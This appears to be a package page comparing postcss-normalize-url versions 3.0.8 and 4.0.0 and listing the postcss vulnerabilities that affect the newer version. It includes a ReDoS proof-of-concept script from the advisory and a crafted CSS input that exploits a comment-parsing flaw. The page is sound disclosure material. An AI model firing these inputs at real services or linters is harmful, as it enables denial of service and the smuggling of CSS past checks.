Postcss-normalize-url is a PostCSS plugin designed to normalize URLs within your CSS, providing a consistent and predictable experience. Version 4.0.0 represents a notable update from version 3.0.8, primarily concerning its dependencies. The most significant change is the required PostCSS version, jumping from ^5.0.14 to ^6.0.0. This indicates breaking changes in the PostCSS API were addressed, requiring an update for compatibility.
Other notable dependency updates include normalize-url, the core component for URL normalization, which moved from ^1.4.0 to ^3.0.0 and likely brings newer normalization rules and features. Developers should review the breaking changes of that dependency when updating; is-absolute-url, by contrast, remained at ^2.0.0.
From a development perspective, version 3.0.8 utilized a wide array of development dependencies for testing, linting, and build processes, including Ava, ESLint, and various Babel plugins and presets. In contrast, version 4.0.0 streamlines the development dependencies to only include Babel-cli and cross-env. This suggests a shift in the build process or potentially a simplification of the testing and linting strategy.
Another relevant difference is the PostCSS value parser dependency: version 3.0.8 pins 3.2.3, while version 4.0.0 accepts ^3.0.0. The repository URL change from git+https://github.com/ben-eb/postcss-normalize-url.git to https://github.com/cssnano/cssnano.git indicates a change of ownership of the package, or at least of the repository being tracked, and suggests a change in maintainership or direction for the plugin. For those using PostCSS 6 or later, version 4.0.0 is the recommended choice. Existing users of version 3.0.8 should carefully review the dependency updates, particularly PostCSS and normalize-url, to ensure compatibility and a smooth migration.
All the vulnerabilities related to version 4.0.0 of the package
Regular Expression Denial of Service in postcss
The postcss package, in versions before 7.0.36 or from 8.0.0 up to 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
Proof-of-concept timing harness from the advisory:

```javascript
var postcss = require("postcss")

// Build "a{}" followed by n annotation openers and no closing "*/",
// so every opener makes the annotation regex scan and backtrack to the end.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm up the parser with a benign annotation first.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse progressively longer inputs and report how long each takes;
// the time grows much faster than the input length.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
```
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being part of a comment.